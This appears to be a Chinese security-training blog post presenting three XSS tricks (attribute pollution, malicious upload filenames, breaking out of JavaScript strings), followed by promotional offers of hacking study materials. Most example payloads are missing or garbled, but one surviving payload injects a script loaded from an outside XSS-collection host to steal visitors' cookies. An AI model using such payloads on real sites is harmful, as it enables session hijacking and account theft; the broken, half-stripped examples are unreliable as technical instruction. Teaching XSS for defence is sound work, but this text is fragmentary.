【Web安全入门】三个技巧教你玩转XSS漏洞

XSS漏洞是Web应用程序中最常见的漏洞之一,想要入门Web安全的小伙伴,这个知识点是必学的。

i春秋官网中有很多关于XSS漏洞的课程,新手小白可以去官网看课学习。

学习地址:https://www.ichunqiu.com/search/XSS漏洞

XSS是一种经常出现在Web应用中的计算机安全漏洞,也是客户端脚本安全的头号大敌。今天i春秋跟大家分享的是XSS漏洞的进阶篇,如何利用XSS漏洞的一些小技巧,希望对大家学习Web安全有所帮助。

污染标签

简单的说,XSS漏洞的本质就是输入与输出。

比如,我的QQ网名是:

“你的网名”>

结果就被污染成

这样的话我就成功弹窗了,但又有什么用呢?

我们可以构造语句:

<input value=“”#ff0000">http%3A%2F%2Fxssnow.com%2FdZJ4%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));">

这样我们就能成功打到cookie了。

文件名称XSS

有些网站有上传点,但是后台并未对文件名做更改。

比如上传以后前端代码是这样的:

test

1.rar假设就是我们上传的文件。

我们是不是又可以构造语句闭合或者污染标签,值得一提的是,你需要抓包改文件名(想在Windows环境下改,你去试试就知道是怎么回事了)

我们就改成:

">.rar

这样的话,就变成:

成功弹窗,如果过滤了尖括号 < >

就可以按照之前讲的标签污染法,让它执行我们的JS语句。

闭合JS

有时候,JS会调用我们网站的一些资料,类似昵称。

welcome sqler;

因为我们昵称是被包含在里,我们无法利用。

这样我们就需要为它打开一个新大门。

这样我们就成功弹窗。

以上就是今天要分享的内容,是不是很简单。

XSS漏洞是Web安全入门必掌握的知识点,当然还有CSRF漏洞、Webshell与文件上传漏洞、SQL注入等等,这些相对应的学习资料,我都有整理。

如果你是准备学习网络安全(黑客)或者正在学习,下面这些你应该能用得上:

①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

一、网络安全(黑客)学习路线

网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

二、网络安全教程视频

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

三、网络安全CTF实战案例

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
SRC资料

四、网络安全面试题

最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。
面试题

网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。

机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!

这份完整版的学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值